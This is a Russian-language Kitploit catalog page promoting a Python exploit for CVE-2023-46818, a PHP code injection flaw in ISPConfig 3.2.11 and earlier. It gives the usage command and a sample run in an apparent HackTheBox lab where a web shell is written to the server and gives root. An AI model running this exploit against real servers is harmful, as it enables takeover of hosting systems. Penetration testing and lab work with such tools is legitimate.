Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-46818 — CVE-2023-46818 Python3 Эксплойт для ISPConfig <= 3.2.11 (language_edit.php) Уязвимость внедрения PHP-кода | Kitploit
Инструменты/GitHubGitHub/ajdumanhug/cve-2023-46818
Генерация полезной нагрузкиАнализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubajdumanhug/cve-2023-46818

CVE-2023-46818

CVE-2023-46818 Python3 Эксплойт для ISPConfig <= 3.2.11 (language_edit.php) Уязвимость внедрения PHP-кода

Репозиторий
152161 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-46818 Python Exploit

🔥 Описание

Этот скрипт эксплойта на Python нацелен на уязвимость безопасности в параметре records POST-запроса к /admin/language_edit.php в ISPConfig, который не фильтруется должным образом. Это позволяет аутентифицированному администратору внедрять и выполнять произвольный PHP-код.

⚠️ Уязвимые версии

Версия 3.2.11 и более ранние версии.

⚙️ Использование

root@kitploit:~
python3 CVE-2023-46818.py <URL> <Имя_пользователя> <Пароль>

💻 Пример запуска

root@kitploit:~
┌──(motoh4ck3r㉿kali)-[~/HTB/Linux/nocturnal]
└─$ python3 CVE-2023-46818.py http://127.0.0.1:8081 motoh4ck3r broombroom
[+] Выполняется вход с именем пользователя 'motoh4ck3r' и паролем 'broombroom'
[+] Вход выполнен успешно!
[*] Получение CSRF-токенов...
[+] CSRF ID: language_edit_92017c65f0bcba0f230f5cc1
[+] CSRF Key: 7d06eed7d23c29e5c9633920a8122339d91373e8
[+] Внедрение полезной нагрузки для shell...
[+] Shell записан по адресу: http://127.0.0.1:8081/admin/sh.php
[+] Запуск shell...

ispconfig-shell# hostname & whoami & id
nocturnal
root
uid=0(root) gid=0(root) groups=0(root)

ispconfig-shell#

ℹ️ Ссылка

https://seclists.org/fulldisclosure/2023/Dec/2

❤️ Благодарности

Спасибо Egidio Romano за это открытие.

Скачать инструмент